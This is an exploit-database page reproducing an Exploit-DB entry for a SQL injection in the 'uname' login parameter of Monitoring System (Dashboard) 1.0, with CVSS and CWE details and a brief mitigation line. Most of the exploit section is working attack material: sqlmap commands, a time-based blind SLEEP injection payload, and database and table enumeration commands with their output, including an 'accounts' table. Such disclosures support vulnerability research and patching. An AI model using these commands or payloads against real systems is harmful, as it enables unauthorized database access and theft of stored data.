header-logo
Suggest Exploit
vendor:
Monitoring System (Dashboard)
by:
Richard Jones
8.8
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Monitoring System (Dashboard)
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: NO
Related CWE: N/A
CPE: a:sourcecodester:monitoring_system_(dashboard)
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34
2021

Monitoring System (Dashboard) 1.0 – ‘uname’ SQL Injection

SQL Injection vulnerability in Monitoring System (Dashboard) 1.0 allows an attacker to inject malicious SQL code into the 'uname' parameter of the login.php page. By exploiting this vulnerability, an attacker can gain access to the database and dump the contents of the database.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.
Source

Exploit-DB raw data:

# Exploit Title: Monitoring System (Dashboard) 1.0 - 'uname' SQL Injection
# Exploit Author: Richard Jones
# Date: 2021-01-26
# Vendor Homepage: https://www.sourcecodester.com/php/11741/monitoring-system-dashboard.html
# Software Link: https://www.sourcecodester.com/download-code?nid=11741&title=Monitoring+System+%28Dashboard%29+using+PHP+with+Source+Code
# Version: 1.0
# Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34

Steps. 

1. Run sqlmap
"sqlmap -u "http://localhost/asistorage/login.php" --data="uname=a&upass=w&btnlogin=" --batch

2. 
Parameter: uname (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: uname=a' AND (SELECT 4539 FROM (SELECT(SLEEP(5)))zdoW) AND 'YWTS'='YWTS&upass=w&btnlogin=


Exploit paths: 

Database: 
sqlmap -u "http://localhost/asistorage/login.php" --data="uname=a&upass=w&btnlogin=" --batch --dbms=mysql --dbs

Tables: 
sqlmap -u "http://localhost/asistorage/login.php" --data="uname=a&upass=w&btnlogin=" --batch --dbms=mysql -D asidatabase --tables
[11 tables]
+------------+
| accounts   |
| attendance |
| contacts   |
| employee   |
| gallery    |
| msexcel    |
| msppt      |
| msword     |
| oic        |
| random     |
| sign       |
+------------+

Navigation

Suggest Exploit

Services By CQR